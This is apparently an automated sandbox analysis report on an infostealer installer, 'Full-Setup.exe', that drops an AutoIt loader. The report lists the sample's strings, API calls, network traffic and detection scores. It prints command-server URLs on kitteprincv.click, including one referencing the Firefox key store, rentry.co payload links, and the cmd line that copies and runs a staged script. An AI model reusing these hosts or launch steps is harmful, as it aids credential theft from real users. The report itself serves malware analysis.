Source: Glow.com, 0000000A.00000003.2261523339.0000000004919000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: Glow.com, 0000000A.00000003.2164760274.0000000004F33000.00000004.00000800.00020000.00000000.sdmp, Glow.com.1.dr, Environments.0.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: Glow.com, 0000000A.00000003.2164760274.0000000004F33000.00000004.00000800.00020000.00000000.sdmp, Glow.com.1.dr, Environments.0.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Glow.com, 0000000A.00000003.2164760274.0000000004F33000.00000004.00000800.00020000.00000000.sdmp, Glow.com.1.dr, Environments.0.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Glow.com, 0000000A.00000003.2164760274.0000000004F33000.00000004.00000800.00020000.00000000.sdmp, Glow.com.1.dr, Environments.0.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Glow.com, 0000000A.00000003.2164760274.0000000004F33000.00000004.00000800.00020000.00000000.sdmp, Glow.com.1.dr, Environments.0.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: powershell.exe, 0000000F.00000002.2394229441.0000000003066000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microvr
Source: Glow.com, 0000000A.00000003.2261523339.0000000004919000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: Glow.com, 0000000A.00000003.2261523339.0000000004919000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: Glow.com, 0000000A.00000003.2261523339.0000000004919000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: Glow.com, 0000000A.00000003.2261523339.0000000004919000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: Glow.com, 0000000A.00000003.2261523339.0000000004919000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: Full-Setup.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Glow.com, 0000000A.00000003.2261523339.0000000004919000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: Glow.com, 0000000A.00000003.2164760274.0000000004F33000.00000004.00000800.00020000.00000000.sdmp, Glow.com.1.dr, Environments.0.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: Glow.com, 0000000A.00000003.2261523339.0000000004919000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Glow.com, 0000000A.00000003.2164760274.0000000004F33000.00000004.00000800.00020000.00000000.sdmp, Glow.com.1.dr, Environments.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Glow.com, 0000000A.00000003.2164760274.0000000004F33000.00000004.00000800.00020000.00000000.sdmp, Glow.com.1.dr, Environments.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Glow.com, 0000000A.00000003.2164760274.0000000004F33000.00000004.00000800.00020000.00000000.sdmp, Glow.com.1.dr, Environments.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: powershell.exe, 0000000F.00000002.2395086529.0000000004E81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Glow.com, 0000000A.00000003.2164760274.0000000004F33000.00000004.00000800.00020000.00000000.sdmp, Glow.com.1.dr, Environments.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Glow.com, 0000000A.00000003.2164760274.0000000004F33000.00000004.00000800.00020000.00000000.sdmp, Glow.com.1.dr, Environments.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: Glow.com, 0000000A.00000000.1729969732.0000000000455000.00000002.00000001.01000000.00000006.sdmp, Glow.com, 0000000A.00000003.2164760274.0000000004F33000.00000004.00000800.00020000.00000000.sdmp, Glow.com.1.dr, Problems.0.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: Glow.com, 0000000A.00000003.2261523339.0000000004919000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: Glow.com, 0000000A.00000003.2261523339.0000000004919000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: Glow.com, 0000000A.00000003.2215097988.000000000491C000.00000004.00000800.00020000.00000000.sdmp, Glow.com, 0000000A.00000003.2215232746.0000000001763000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 0000000F.00000002.2395086529.0000000004E81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: Glow.com, 0000000A.00000003.2262928409.000000000488C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: Glow.com, 0000000A.00000003.2262928409.000000000488C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: Glow.com, 0000000A.00000003.2215097988.000000000491C000.00000004.00000800.00020000.00000000.sdmp, Glow.com, 0000000A.00000003.2215232746.0000000001763000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Glow.com, 0000000A.00000003.2215097988.000000000491C000.00000004.00000800.00020000.00000000.sdmp, Glow.com, 0000000A.00000003.2215232746.0000000001763000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Glow.com, 0000000A.00000003.2215097988.000000000491C000.00000004.00000800.00020000.00000000.sdmp, Glow.com, 0000000A.00000003.2215232746.0000000001763000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Glow.com, 0000000A.00000003.2262928409.000000000488C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: Glow.com, 0000000A.00000003.2262928409.000000000488C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: Glow.com, 0000000A.00000003.2215097988.000000000491C000.00000004.00000800.00020000.00000000.sdmp, Glow.com, 0000000A.00000003.2215232746.0000000001763000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Glow.com, 0000000A.00000003.2215097988.000000000491C000.00000004.00000800.00020000.00000000.sdmp, Glow.com, 0000000A.00000003.2215232746.0000000001763000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Glow.com, 0000000A.00000003.2215097988.000000000491C000.00000004.00000800.00020000.00000000.sdmp, Glow.com, 0000000A.00000003.2215232746.0000000001763000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Glow.com, 0000000A.00000003.2262928409.000000000488C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: Glow.com, 0000000A.00000002.2492595373.0000000001388000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://kitteprincv.click/api1)
Source: Glow.com, 0000000A.00000002.2492595373.0000000001388000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://kitteprincv.click/pia)
Source: Glow.com, 0000000A.00000002.2492761826.00000000014E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://kitteprincv.click:443/api
Source: Glow.com, 0000000A.00000002.2492761826.00000000014E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://kitteprincv.click:443/api4p.default-release/key4.dbPK
Source: Glow.com, 0000000A.00000002.2492761826.00000000014E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://kitteprincv.click:443/apiH111H65H70H121H113H109H98H111H98H117H106H112H111H65H66H101H119H102H
Source: Glow.com, 0000000A.00000002.2492761826.00000000014E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://kitteprincv.click:443/apitxtPK
Source: powershell.exe, 0000000F.00000002.2395086529.00000000051B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2395086529.0000000004FD9000.00000004.00000800.00020000.00000000.sdmp, 4VQOL9Z4BW428506NY343FUN.ps1.10.dr	String found in binary or memory: https://rentry.co/
Source: powershell.exe, 0000000F.00000002.2395086529.00000000051B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2395086529.00000000051EE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rentry.co/hZ
Source: 4VQOL9Z4BW428506NY343FUN.ps1.10.dr	String found in binary or memory: https://rentry.co/static/icons/512.png
Source: powershell.exe, 0000000F.00000002.2395086529.00000000051B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2395086529.00000000051EE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rentry.co/static/icons/512.pnghZ
Source: powershell.exe, 0000000F.00000002.2395086529.00000000051B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2395086529.0000000004FD9000.00000004.00000800.00020000.00000000.sdmp, 4VQOL9Z4BW428506NY343FUN.ps1.10.dr	String found in binary or memory: https://rentry.co/what
Source: powershell.exe, 0000000F.00000002.2395086529.00000000051B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2395086529.00000000051EE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rentry.co/whathZ
Source: Glow.com, 0000000A.00000002.2492761826.00000000014E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rentry.co:443/feouewe5/raw
Source: Glow.com, 0000000A.00000003.2215505651.0000000004922000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: Glow.com, 0000000A.00000003.2262531789.0000000005B65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: Glow.com, 0000000A.00000003.2262531789.0000000005B65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: Glow.com, 0000000A.00000003.2215505651.0000000004922000.00000004.00000800.00020000.00000000.sdmp, Glow.com, 0000000A.00000003.2215604698.0000000001775000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: Glow.com, 0000000A.00000003.2215604698.0000000001750000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: Glow.com, 0000000A.00000003.2215505651.0000000004922000.00000004.00000800.00020000.00000000.sdmp, Glow.com, 0000000A.00000003.2215604698.0000000001775000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: Glow.com, 0000000A.00000003.2215604698.0000000001750000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: Glow.com, 0000000A.00000003.2262928409.000000000488C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: Glow.com, 0000000A.00000003.2164760274.0000000004F33000.00000004.00000800.00020000.00000000.sdmp, Glow.com.1.dr, Environments.0.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Glow.com, 0000000A.00000003.2215097988.000000000491C000.00000004.00000800.00020000.00000000.sdmp, Glow.com, 0000000A.00000003.2215232746.0000000001763000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Glow.com, 0000000A.00000003.2262928409.000000000488C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: Environments.0.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: Glow.com, 0000000A.00000003.2215097988.000000000491C000.00000004.00000800.00020000.00000000.sdmp, Glow.com, 0000000A.00000003.2215232746.0000000001763000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: powershell.exe, 0000000F.00000002.2395086529.00000000051B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2395086529.0000000004FD9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2395086529.00000000051EE000.00000004.00000800.00020000.00000000.sdmp, 4VQOL9Z4BW428506NY343FUN.ps1.10.dr	String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-LLFSDKZXET
Source: Glow.com, 0000000A.00000003.2262531789.0000000005B65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: Glow.com, 0000000A.00000003.2262531789.0000000005B65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: Glow.com, 0000000A.00000003.2262531789.0000000005B65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: Glow.com, 0000000A.00000003.2262531789.0000000005B65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Glow.com, 0000000A.00000003.2262531789.0000000005B65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767

Source: unknown	HTTPS traffic detected: 104.21.43.127:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.43.127:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.43.127:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.43.127:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.43.127:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.43.127:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.43.127:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.43.127:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.3.16:443 -> 192.168.2.4:49773 version: TLS 1.2

Source: C:\Users\user\Desktop\Full-Setup.exe

Code function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004050F9

Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com

Code function: 10_2_003FF7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

10_2_003FF7C7

Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com

Code function: 10_2_003FF55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

10_2_003FF55C

Source: C:\Users\user\Desktop\Full-Setup.exe

Code function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004044D1

Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com

Code function: 10_2_00419FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

10_2_00419FD2

Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com

Code function: 10_2_003F4763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,

10_2_003F4763

Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com

Code function: 10_2_003E1B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

10_2_003E1B4D

Source: C:\Users\user\Desktop\Full-Setup.exe	Code function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,		0_2_004038AF
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: 10_2_003EF20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		10_2_003EF20D

Source: C:\Users\user\Desktop\Full-Setup.exe	File created: C:\Windows\AolSwim	Jump to behavior
Source: C:\Users\user\Desktop\Full-Setup.exe	File created: C:\Windows\ReferredWarranties	Jump to behavior
Source: C:\Users\user\Desktop\Full-Setup.exe	File created: C:\Windows\TeachesFairly	Jump to behavior
Source: C:\Users\user\Desktop\Full-Setup.exe	File created: C:\Windows\SalemRecognize	Jump to behavior
Source: C:\Users\user\Desktop\Full-Setup.exe	File created: C:\Windows\BoatsMethod	Jump to behavior
Source: C:\Users\user\Desktop\Full-Setup.exe	File created: C:\Windows\WorkedOn	Jump to behavior
Source: C:\Users\user\Desktop\Full-Setup.exe	File created: C:\Windows\LatinoEvans	Jump to behavior
Source: C:\Users\user\Desktop\Full-Setup.exe	File created: C:\Windows\DeanExcitement	Jump to behavior

Source: C:\Users\user\Desktop\Full-Setup.exe	Code function: 0_2_0040737E	0_2_0040737E
Source: C:\Users\user\Desktop\Full-Setup.exe	Code function: 0_2_00406EFE	0_2_00406EFE
Source: C:\Users\user\Desktop\Full-Setup.exe	Code function: 0_2_004079A2	0_2_004079A2
Source: C:\Users\user\Desktop\Full-Setup.exe	Code function: 0_2_004049A8	0_2_004049A8
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: 10_2_003A8017	10_2_003A8017
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: 10_2_0039E144	10_2_0039E144
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: 10_2_0038E1F0	10_2_0038E1F0
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: 10_2_003BA26E	10_2_003BA26E
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: 10_2_003822AD	10_2_003822AD
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: 10_2_003A22A2	10_2_003A22A2
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: 10_2_0039C624	10_2_0039C624
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: 10_2_003BE87F	10_2_003BE87F
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: 10_2_0040C8A4	10_2_0040C8A4
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: 10_2_003F2A05	10_2_003F2A05
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: 10_2_003B6ADE	10_2_003B6ADE
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: 10_2_003E8BFF	10_2_003E8BFF
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: 10_2_0039CD7A	10_2_0039CD7A
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: 10_2_003ACE10	10_2_003ACE10
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: 10_2_003B7159	10_2_003B7159
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: 10_2_00389240	10_2_00389240
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: 10_2_00415311	10_2_00415311
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: 10_2_003896E0	10_2_003896E0
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: 10_2_003A1704	10_2_003A1704
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: 10_2_003A1A76	10_2_003A1A76
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: 10_2_00389B60	10_2_00389B60
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: 10_2_003A7B8B	10_2_003A7B8B
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: 10_2_003A1D20	10_2_003A1D20
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: 10_2_003A7DBA	10_2_003A7DBA
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: 10_2_003A1FE7	10_2_003A1FE7

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\600044\Glow.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49

Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: String function: 003A0DA0 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: String function: 0039FD52 appears 40 times
Source: C:\Users\user\Desktop\Full-Setup.exe	Code function: String function: 004062CF appears 58 times

Source: Full-Setup.exe

Static PE information: invalid certificate

Source: Full-Setup.exe, 00000000.00000002.1805973468.00000000006B1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exej% vs Full-Setup.exe
Source: Full-Setup.exe, 00000000.00000003.1805228299.00000000006B1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exej% vs Full-Setup.exe

Source: Full-Setup.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@25/27@3/2

Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com

Code function: 10_2_003F41FA GetLastError,FormatMessageW,

10_2_003F41FA

Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: 10_2_003E2010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		10_2_003E2010
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: 10_2_003E1A0B AdjustTokenPrivileges,CloseHandle,		10_2_003E1A0B

Source: C:\Users\user\Desktop\Full-Setup.exe

0_2_004044D1

Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com

Code function: 10_2_003EDD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

10_2_003EDD87

Source: C:\Users\user\Desktop\Full-Setup.exe

Code function: 0_2_004024FB CoCreateInstance,

0_2_004024FB

Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com

Code function: 10_2_003F3A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

10_2_003F3A0E

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8096:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7372:120:WilError_03

Source: C:\Users\user\Desktop\Full-Setup.exe

File created: C:\Users\user\AppData\Local\Temp\nsf4E1D.tmp

Jump to behavior

Source: Full-Setup.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com

System information queried: HandleInformation

Jump to behavior

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\Full-Setup.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Full-Setup.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Glow.com, 0000000A.00000003.2240602057.0000000004884000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Full-Setup.exe	Virustotal: Detection: 59%
Source: Full-Setup.exe	ReversingLabs: Detection: 57%

Source: C:\Users\user\Desktop\Full-Setup.exe

File read: C:\Users\user\Desktop\Full-Setup.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Full-Setup.exe "C:\Users\user\Desktop\Full-Setup.exe"
Source: C:\Users\user\Desktop\Full-Setup.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Spare Spare.cmd && Spare.cmd
